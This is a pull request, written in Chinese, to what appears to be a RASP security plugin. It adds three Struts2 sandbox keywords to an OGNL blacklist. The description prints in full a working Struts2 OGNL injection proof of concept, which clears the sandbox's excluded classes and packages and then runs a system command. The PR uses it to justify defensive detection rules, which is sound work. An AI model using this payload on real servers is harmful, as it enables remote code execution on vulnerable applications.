### PR TITLE
增加st2的黑名单关键词

### DIFF
--- a/plugins/official/plugin.js
+++ b/plugins/official/plugin.js
@@ -464,6 +464,9 @@ var algorithmConfig = {
             'java.lang.Shutdown',
             'java.io.File',
             'javax.script.ScriptEngineManager',
+            'excludedClasses',
+            'excludedPackageNamePatterns',
+            'excludedPackageNames',
             'com.opensymphony.xwork2.ActionContext'
         ]
     },


### PR DESCRIPTION
首先官网文档如下：
There are three options that can be used to configure excluded packages and classes:

struts.excludedClasses - comma-separated list of excluded classes
struts.excludedPackageNamePatterns - patterns used to exclude packages based on RegEx - this option is slower than simple string comparison but it’s more flexible
struts.excludedPackageNames - comma-separated list of excluded packages, it is used with simple string comparison via startWith and equals

可以看出有三个关键词是st沙盒内置的黑名单：
excludedClasses     excludedPackageNamePatterns    excludedPackageNames 

而最新的poc也在执行命令前清空了excludedClasses和excludedPackageNames，poc如下：
```
%{
(#application.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + 
(#application.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + 
(#application.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) +
(#application.map2.setBean(#application.get('map').get('context')) == true).toString().substring(0,0) + 
(#application.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + 
(#application.map3.setBean(#application.get('map2').get('memberAccess')) == true).toString().substring(0,0) + 
(#application.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + 
(#application.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))
}
```

而对应的OGNL 沙盒规则还包括：

1不能调用静态方法
2不能使用反射 
3无法创建新对象 

我认为rasp的ognl黑名单中如果屏蔽掉st2自身的黑名单列表三个关键词，可以继续加强st框架的防护能力